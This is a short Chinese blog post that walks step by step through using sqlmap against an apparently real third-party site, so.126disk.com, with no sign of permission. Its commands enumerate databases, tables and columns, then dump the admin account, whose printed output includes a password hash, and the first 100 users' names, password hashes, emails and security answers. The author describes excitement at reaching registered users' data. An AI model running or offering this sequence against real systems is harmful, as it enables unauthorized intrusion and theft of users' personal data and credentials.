SQLMap注入拖庫(kù)

SQLMAP是一款開(kāi)源的滲透測(cè)試程序,它可以自動(dòng)探測(cè)和利用SQL注入漏洞來(lái)獲得我們想要的數(shù)據(jù)。我們可以利用它執(zhí)行特定的命令、查看文件、獲取各種數(shù)據(jù);當(dāng)然,最猥瑣的是它利用注入點(diǎn)拖庫(kù)的速率還是灰常讓人滿意的。

滲透開(kāi)始-->

注入點(diǎn):"http://so.126disk.com/search?key=A"

測(cè)試環(huán)境:?BackTrack?5??/???SQLMAP?0.9

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--dbs

//?列舉數(shù)據(jù)庫(kù)?-->?126disk?,?information_schema

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--current-db

//?當(dāng)前數(shù)據(jù)庫(kù)?-->?126disk

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--users

//?列數(shù)據(jù)庫(kù)用戶

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--current-user

//?當(dāng)前用戶

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--tables?-D?"126disk"

//?列舉數(shù)據(jù)庫(kù)126disk的表名

獲取表名

+---------------------+

disk_admin

disk_adminlog

disk_adminmsg

disk_collection

disk_count

disk_file

disk_gonggao

disk_guolv

disk_haoyou

disk_integral

disk_integrallog

disk_jubao

disk_link

disk_links

disk_message

disk_mulu

disk_search

disk_server

disk_tag

disk_type

disk_user

disk_userlog

disk_visitors

disk_zhuanji

+----------------------+

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--columns?-T?"disk_admin"?-D?"126disk"

//?獲取表disk_admin的列名

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--dump?-C?"id,login,pass,user"?-T?"disk_admin"?-D?"126disk"

//?獲取表disk_admin中的數(shù)據(jù),包含列?id,login,pass,user???-->?1|9|admin|8e8df10cbce2ef46c3d25c3a5f7fe159

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--columns?-T?"disk_user"?-D?"126disk"

//?獲取表disk_user的列名

當(dāng)看到這些列名時(shí),心中是莫名的激動(dòng)。里面可都是注冊(cè)用戶的數(shù)據(jù)啊

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--dump?-C?"id,name,pass,email,wenti,daan"?-T?"disk_user"?-D?"126disk"?--start?1?--stop?100

//?獲取表disk_user的前100條數(shù)據(jù),包含id,name,pass,email,wenti,daan;這里已經(jīng)開(kāi)始拖庫(kù)了

SQLMAP是非常人性化的,它會(huì)將獲取的數(shù)據(jù)存儲(chǔ)在/pentest/web/scanners/sqlmap/output/so.126disk.com/dump/126disk/

補(bǔ)充:?在獲取數(shù)據(jù)的過(guò)程中會(huì)詢問(wèn)是否破解HASH密碼,這里選擇n,我們不急于破解密文

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容